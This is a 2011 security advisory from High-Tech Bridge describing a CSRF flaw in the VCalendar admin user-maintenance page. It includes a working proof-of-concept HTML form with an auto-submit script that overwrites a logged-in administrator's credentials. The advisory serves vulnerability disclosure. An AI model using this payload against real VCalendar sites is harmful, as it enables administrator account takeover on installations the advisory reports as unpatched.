Total Tests:

Cross-site Request Forgery (CSRF) in VCalendar

This vulnerability was discovered by our security researchers before 2019.

Advisory ID:HTB22969
Product:VCalendar
Vendor:UltraApps
Vulnerable Versions:1.1.5 and probably prior
Tested Version:1.1.5
Advisory Publication:April 21, 2011 [without technical details]
Vendor Notification:April 21, 2011
Public Disclosure:May 5, 2011
Vulnerability Type:Cross-Site Request Forgery [CWE-352]
Risk Level:Medium
Medium Risk
CVSSv2 Base Score:5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered vulnerability in VCalendar which could be exploited to perform cross-site request forgery attacks.

1) Cross-site request forgery (CSRF) in VCalendar
The vulnerability exists due to insufficient validation of the request origin in admin/users_maint.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and modify administrator`s credentials.
Exploitation example:

<form action="http://[host]/admin/users_maint.php?ccsForm=users_maint" method="post" name="main" />
<input type="hidden" name="user_login" value="test"/>
<input type="hidden" name="user_password" value="test"/>
<input type="hidden" name="user_level" value="100"/>
<input type="hidden" name="user_email" value="[email protected]"/>
<input type="hidden" name="user_first_name" value="test"/>
<input type="hidden" name="user_last_name" value="test"/>
<input type="hidden" name="user_is_approved" value="1"/>
<input type="hidden" name="user_date_add_h" value="04.16.2011"/>
<input type="submit" id="btn" name="submit" value="Submit ››">
</form>
<script>
document.getElementById('btn').click();
</scri pt>


Solution:
Currently we are not aware of any vendor-supplied patches or other solutions. The vendor was contacted in accordance to our Vendor Notification Policy but we didn't get any answer or feedback.


References:
[1] High-Tech Bridge Advisory HTB22969 - https://www.immuniweb.com/advisory/HTB22969 - Cross-site Request Forgery (CSRF) in VCalendar
[2] VCalendar - ultraapps.com - VCalendar is a free calendar application for managing events and schedules with source code in ASP, ASP.NET/C# and PHP
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Ask a Question